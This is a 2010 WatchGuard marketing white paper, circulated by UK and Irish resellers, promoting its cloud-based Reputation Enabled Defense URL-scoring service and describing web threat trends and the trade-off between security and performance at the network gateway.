WatchGuard Technologies is promoting its cloud-based web security solution called Reputation Enabled Defense. This solution uses reputation scoring from a large database to determine if URLs are safe to access, allowing safe URLs to bypass antivirus scanning for faster page loading. It provides an extra layer of protection against evolving web threats in real-time without sacrificing performance. The benefits include improved security against malware, better performance through reduced scanning, and a more proactive approach to fighting threats.
1. Document Presented By Wick Hill and DNA IT
River Court,
Albert Drive,
Woking, Surrey
GU21 5RP
01483 227600
info@wickhill.co.uk
www.wickhill.com/watchguard
Unit J 2,
Maynooth Business Campus,
Maynooth,
Co.Kildare
+353 1 651 0300
sales@dnait.ie
www.dnait.ie
2. Cloud-based Web Security Isn’t Hype:
It’s Here and It Works
June 2010
INTRODUCTION
It’s not news that the web is dangerous and getting more dangerous by the day. Cyber criminals have
ample economic motive and easy-to-use tools to harness the power of the web in capturing and misusing
your data.
What is news is that now you can protect your company’s valuable assets from web-based attacks with
an innovative, effective new form of web security – cloud-based, reputation-driven defense.
Web Threats are on the Rise
The web is experiencing phenomenal growth, and with it, an unprecedented increase in the amount of
new malware types that target web browsers, applications, and Web 2.0 infrastructure. Because
cybercriminals can reap large profits from attacks that result in identity and data theft, a growing number
of organized crime rings continuously fund new attempts to spread malware and acquire web users’
personal data. Through modified packing and encrypting techniques, and other obfuscation methods,
attackers can now create thousands of new variants of the same threat with relatively little effort. Despite
these threats, most organizations continue to leverage new web-based applications to drive revenue and
efficiencies, particularly as Web 2.0 technologies deliver new ways to interact and engage with customers
and stakeholders.
Organizations frequently underestimate their exposure to malicious attacks. The statistics can be
sobering. In 2009 alone, there was a dramatic 345% increase in the number of new malicious web links
1
discovered. These included high-profile sites, including those run by MSNBC, ZDNet, The United Nations,
1
IBM X-Force 2009 Trend and Risk Report
WatchGuard Technologies www.watchguard.com
3. 2
and Honda. According to IDC, up to 30% of companies with 500 or more staff have been infected as a
3
result of Internet surfing. In other words, anywhere web users interact, malware encounters are
frequent and common. To fend off new forms of malware – including spyware, viruses, crimeware and
other malicious codes – organizations must better safeguard their web security infrastructure. A reactive
and fixed security infrastructure must be turned into one that is proactive and adaptable to changes in the
threat landscape.
There are many ways that legitimate websites can become infected. One inbound threat that has
recently gained popularity among cybercriminals is the SQL injection. Hackers use SQL injections to get
access to database-driven websites, planting malicious code for site visitors. This can be combined with
Web 2.0-based social engineering attacks in which users believe they are being pointed to legitimate
content. Compromised sites may host drive-by-downloads, where malware exploits vulnerabilities on the
users’ systems to download malware without any user interaction. Common applications such as Apple
QuickTime® and Adobe PDF® may be exploited. Thus, an organization’s own application vulnerabilities
and web site code flaws open the door to cybercriminals seeking to infiltrate the organization.
THE NEED TO BALANCE SECURITY AND PERFORMANCE
Many IT security professionals face conflicting demands from management and network users when it
comes to web security. The need for speed is always in demand, but delivering that speed while
enhancing security for a broader, more dynamic threat environment is quite challenging. Following are
some of the most frequent obstacles to achieving this goal:
• A lack of additional IT budget to shore up network security
• Network constraints that conflict with security issues around cloud computing
• Performance degradations across the network due to additional hosted services
The options for overcoming these obstacles to proactive, multi-layered security are either unappealing or
insufficient. For example, one defense against the widespread proliferation of malware is to install anti-
virus scanning at the gateway, capturing malware before it ever enters the network. But scanning every
page and object at the URL can slow down web page delivery and affect both throughput at the device
and the user experience at the browser. Some network administrators may be reluctant to use gateway
anti-virus because of its performance impact.
Finally, desktop or browser-based scanning solutions only catch threats once they are in the network. By
the time these solutions alert users, today’s malware could have already inflicted great amounts of
damage to the organization’s computing infrastructure and/or compromised sensitive data from within
the organization.
URL Filtering is Not Enough
Since the 1990s, reputation services have been helping organizations block unwanted or bad traffic to
ensure that threats never enter the network. By identifying and blocking threats at the perimeter,
reputation services help prevent attacks, reduce the on-premise IT footprint required to scan traffic, and
lower the costs associated with the bandwidth, hardware, and other resources required to block threats.
As web technologies and the web itself have grown more sophisticated, early generation reputation
2
Gartner IT Security Conference 2009, Securing the Web Gateway, Peter Firstbrook
3
Journal Of Emerging Technologies In Web Intelligence, Vol. 2, No. 2, May 2010, Protecting Data from the Cyber Theft
– A Virulent Disease
www.watchguard.com page 2
4. services have become less effective in identifying and blocking threats. To fully understand this loss of
effectiveness, it's important to understand how these services have evolved.
On the dynamic web, sites are continuously updated with new content, while URLs are frequently sold
and altered. So a site that is scanned and categorized as legitimate by URL filters today may become a
malware hub at some later point in time. In order to properly filter out hazardous and dangerous
websites, a filter cannot merely rely on a static database. According to a report by IDC, “The advances in
Web 2.0 technologies require a new generation of web security tools that go well beyond traditional URL
4
filtering.” It must be as dynamic as the web itself, providing real-time threat protection. In addition, it
must scale to handle the vast growth of the Internet.
Effective Security is Proactive and Multi-Layered
The most effective approach for defending against the web’s
dynamic threats is a proactive, multi-layered approach to web Web Security Numbers
security. Being proactive requires that the security solution reach
A look at some of the most recent
into the Internet cloud, obtain the latest threat data from multiple
figures related to web security
threat-monitoring sources, and prepare a network’s perimeter in
demonstrates the need for IT
the event that one of the threats presents itself to the network.
security professionals to
Effective defense is multi-layered, applying additional measures of
proactively manage a broad array
threat scanning, depending on the type of content that attempts
to enter the network. of ever-changing threat types.
• 40,000 websites per week were
WatchGuard® Reputation Enabled Defense™ provides effective, compromised during 2008-
instantaneous, in-depth web security in real time. Based on the 2009.
5
from-the-cloud security of WatchGuard ReputationAuthority®,
Reputation Enabled Defense leverages the cloud-based • The Gumblar virus alone
intelligence of millions of global sources and users, sharing compromised 60,000
6
information about threats associated with URLs and domains in websites.
real-time to automatically block new threats before they enter an
• In 2009, 23,500 new web pages
organization's network. 7
were infected per day.
WatchGuard Reputation Enabled Defense includes real-time • 0.7% of Google Search results
monitoring of web traffic, including scanning of URLs, to determine display sites that have been
the risk level of each and every web page before it enters the infected by malware.
8
network. The solution assesses each threat and type of network
traffic. By scanning for hostile content and blocking malicious URLs • The Mal/Bredo malware had
at the connection level, Reputation Enabled Defense bridges the 838 variants during the first
9
web security gap left exposed by simple URL filtering, provides quarter of 2010.
safer web surfing and faster web performance.
4
IDC, Worldwide Web Security 2009-1013 Forecast and 2008 Marketshares: It’s All About Web 2.0 You TwitFace,
August 2009
5
Google Online Security Blog, Malware Statistics Update, August 25, 2009
6
Google Online Security Blog, Top 10 Malware Sites, June 3, 2009
7
Sophos, Sophos Security Threat Report, July 2009
8
Google Online Security Blog, Malware Statistics Update, August 25, 2009
9
Commtouch, Well-known Web Names Misused to Give Spam Deceptive Legitimacy, According to New Report by
Commtouch, April 14, 2010
www.watchguard.com page 3
5. WHAT TO LOOK FOR IN REPUTATION SERVICES
Reputation services complement gateway antivirus and traditional desktop solutions by providing
improved performance and an additional layer of protection. Unlike traditional gateway anti-virus
solutions, which typically update signatures on an hourly or daily basis, reputation services provide the
equivalent of real-time updates of malware intelligence. The broader and improved URL reputation data
they provide result in greater protection from web threats and faster, more productive web surfing.
However, not all reputation services function in the same manner, so IT security professionals should
exercise caution when evaluating potential solutions.
Many reputation services are implemented as plug-ins that prevent users from visiting web sites known
for malware or phishing. By contrast, WatchGuard has adapted a contributor approach to reputation
services to offer next-generation reputation services. WatchGuard’s reputation and connection
management approach reflects the belief that, to be truly effective and proactively prevent against
evolving threats, reputation services must be a true zero-hour first line of defense. They must not act
simply as a monitoring system that relies on static databases, as most reputation services on the market
do today. Rather, to achieve proactive, adaptive identification, the WatchGuard approach is to manage
web threats at the connection level, and to perform in-depth analysis at the gateway layer. It then
contributes the findings from the gateway to the reputation service in real time, harnessing the
intelligence of millions of global users and sources for more powerful and intelligent protection from
malicious URLs and web threats.
WatchGuard Reputation Enabled Defense users can choose to bypass anti-virus and other scanning
functions for URLs that are known to have a current good reputation, saving time and helping to maintain
performance levels.
WatchGuard Reputation Enabled Defense
WatchGuard Reputation Enabled Defense is available on WatchGuard’s line of multi-function firewall,
unified threat management (XTM) appliances, as well as on its XCS extensible content security appliances
by adding a web security subscription. It provides a cloud-based reputation lookup to identify safe or
harmful URLs. Harnessing threat intelligence from millions of users worldwide, Reputation Enabled
Defense offers an extra layer of protection that acts as a powerful first line of defense from web threats.
By preempting threats before they enter the network, Reputation Enabled Defense helps reduce
computing overhead incurred by anti-virus scanning, particularly costly on-box scanning at the gateway,
and helps speed delivery of approved content. In essence, WatchGuard takes web security beyond the
box and network, managing as much as possible in the cloud.
How Reputation Enabled Defense works
As a cloud-assisted service, Reputation Enabled Defense provides instantaneous security that is updated
continuously. Not only does it improve proactive security, it helps organizations take advantage of greater
computing and processor power from servers hosted in the cloud. IT can save valuable processor
resources on local appliances. As a result, more users can be served at higher rates of throughput – for
less money.
Figure 1 below provides an overview of how Reputation Enabled Defense works to enhance web security.
The core of the service is its cloud-based reputation-scoring database – the industry’s most
comprehensive database – and an on-appliance query system.
www.watchguard.com page 4
6. Give users a faster, safer
web surfing experience
Figure 1: Reputation Enabled Defense uses a powerful, cloud-based database to allow safe traffic in while
keeping bad traffic out. Only unknown traffic is directed to further AV scanning, for substantial gains in
web processing time.
When a web user browses to a URL, the WatchGuard appliance checks a local cache for that URL’s
reputation scores. If the result is not found in the local cache, WatchGuard then queries its cloud-based
ReputationAuthority server for a reputation score for the URL. If the URL has a good reputation, the
appliance approves the URL and bypasses local anti-virus scanning, allowing for faster page rendering and
content delivery.
In the event that a URL is deemed to have a bad reputation (i.e., it contains hostile web threats), the
WatchGuard appliance blocks the URL outright, immediately protecting users from malicious content and
again bypassing local anti-virus scanning. If a URL’s score appears in the gray area between good and bad,
or if there is no score available, the appliance performs its routine defense-in-depth web security checks
and then passes or blocks the URL based on these checks.
WatchGuard recognizes that all organizations use the web differently. That is why Reputation Enabled
Defense is fully configurable. Today’s threats introduce the possibility for normally safe web sites to
become compromised within seconds of their last scan. Administrators can optionally choose not to use
the feature that bypasses scanning of URLs with good reputation.
A True Service that Pays for Itself
WatchGuard ensures that Reputation Enabled Defense is delivering the strongest possible security with
the lowest resource usage. WatchGuard manages the growth of the URL Reputation database via multiple
feeds and aggregated data. This is a continuous and ongoing process, performed by WatchGuard,
enabling customers to benefit from far greater intelligence and security than they have implemented in
their own environment.
Reputation Enabled Defense typically allows the bypass of antivirus scanning for 30-50% of URLs, with an
accompanying increase in web browsing speed and throughput at the multi-function firewall. With the
www.watchguard.com page 5
7. web’s top URLs always clearly rated and always in the reputation database, anti-virus scanning for these
URLs can be bypassed at very low risk. This maximizes performance without sacrificing security when
visiting these sites.
BENEFITS OF REPUTATION ENABLED DEFENSE
WatchGuard Reputation Enabled Defense provides a broad set of security and performance benefits
arising from the ability to perform proactive security measures in the cloud. Below are the most salient
benefits for IT and network administrators.
Security
Organizations can protect their valuable data by increasing efficacy and catch rate of every URL-
based type of malware.
Administrators gain comfort in knowing that unsafe URLs face multiple levels of automated
protection prior to gaining network access.
The full power and knowledge of the broad WatchGuard user community is brought to bear on the
network’s security stance through cloud-based security.
Administrators can strike the ideal balance of security and performance by monitoring scan results
and modifying system configurations.
Performance
Administrators can deliver higher performance to the business and raise user satisfaction levels by
minimizing URL scanning and gaining higher throughput at the gateway.
Administrators can reduce bandwidth and processing cycles with connection-level rejections of bad
web sites.
The most frequented URLs are regularly updated in the ReputationAuthority database because the
WatchGuard technology learns which URLs are popular.
Proactively Fight Malware
Malware continues to spread across the web. The ability of a single organization’s IT staff to monitor and
protect against all threats is eaten away by growing threat volumes and by new and ever-morphing threat
variations. That is why WatchGuard is constantly pushing the envelope to improve methods for proactive
and cloud-based security, taking into account the critical balance that must be maintained between
security and performance.
WatchGuard Reputation Enabled Defense enables organizations to proactively fight the threat of malware
without sacrificing user experience and network performance. In fact, WatchGuard is the only UTM/multi-
function firewall vendor with a URL reputation solution at the gateway.
WatchGuard customers with Reputation Enabled Defense protecting their networks benefit from multiple
outstanding anti-malware technologies that provide more coverage than systems that rely on just one
anti-malware source. And benefits of Reputation Enabled Defense extend to all participating customers,
because the cloud-based service dynamically protects them from newly discovered threats in real time.
By making the incremental investment in Reputation Enabled Defense, customers will gain exponential
levels of protection. Why wait? The cybercriminals are acting now. Get one step ahead of them.
www.watchguard.com page 6